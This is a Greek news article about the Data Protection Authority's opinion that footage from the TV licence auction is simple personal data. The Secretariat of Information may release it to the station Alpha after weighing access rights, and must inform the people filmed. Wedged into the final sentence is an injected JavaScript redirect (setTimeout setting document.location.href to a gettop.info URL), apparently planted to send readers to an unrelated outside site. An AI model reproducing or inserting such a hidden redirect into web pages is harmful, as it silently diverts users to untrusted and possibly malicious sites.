Απόφαση της Γ.Γ Ενημέρωσης το αν θα δοθεί το υλικό από τις κάμερες της δημοπρασίας

0
7

 

Δεν απαιτείται η άδειά της Αρχής Προστασίας Δεδομένων Προσωπικού Χαρακτήρα (ΑΠΔΠΧ), για τη χορήγηση στον τηλεοπτικό σταθμό «Alpha», του μαγνητοσκοπημένου υλικού από την πρόσφατη δημοπρασία για τις τηλεοπτικές άδειες, όπως αναφέρεται σε έγγραφό της προς τη Γενική Γραμματεία Ενημέρωσης.

Και αυτό γιατί, σύμφωνα με την ανεξάρτητη Αρχή, το υλικό αυτό αποτελεί απλά προσωπικά δεδομένα και όχι ευαίσθητα προσωπικά δεδομένα και «δεν απαιτείται η παροχή άδειας της Αρχής εφόσον δεν έλαβε χώρα η επεξεργασία ευαίσθητων προσωπικών δεδομένων αλλά απλών».

Παρ’ όλα αυτά, η Αρχή αναφέρει, ότι η διαβίβαση του υλικού σε τρίτο πρόσωπο, συνιστά «περαιτέρω επεξεργασία απλών προσωπικών δεδομένων» για τη νομιμότητα της οποίας – όπως σημειώνει – θα πρέπει να έχει δώσει τη συγκατάθεσή του το υποκείμενο των δεδομένων.

Σύμφωνα με την Αρχή, επεξεργασία προσωπικών δεδομένων χωρίς τη συγκατάθεση του υποκειμένου, είναι κατ’ εξαίρεση επιτρεπτή, μόνο όταν είναι αναγκαία «για την εκπλήρωση υποχρεώσεως του υπευθύνου επεξεργασίας, η οποία επιβάλλεται από το νόμο».

Κατά την Αρχή, τέτοια υποχρέωση προβλέπεται από τη σχετική διάταξη για το δικαίωμα πρόσβασης στα δημόσια έγγραφα.
Συνεπώς, τονίζει η Αρχή, η Γενική Γραμματεία θα πρέπει να σταθμίσει, αφενός αν συντρέχουν οι προϋποθέσεις για πρόσβαση στα δημόσια έγγραφα και αφετέρου το έννομο συμφέρον που επικαλείται ο σταθμός και να αποφασίσει εάν θα χορηγήσει ή όχι το υλικό.

Τέλος, σε περίπτωση χορήγησης, αλλά και επίδειξης του υλικού, η Γενική Γραμματεία οφείλει να ενημερώσει τα πρόσωπα

που καταγράφονται σε αυτό. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here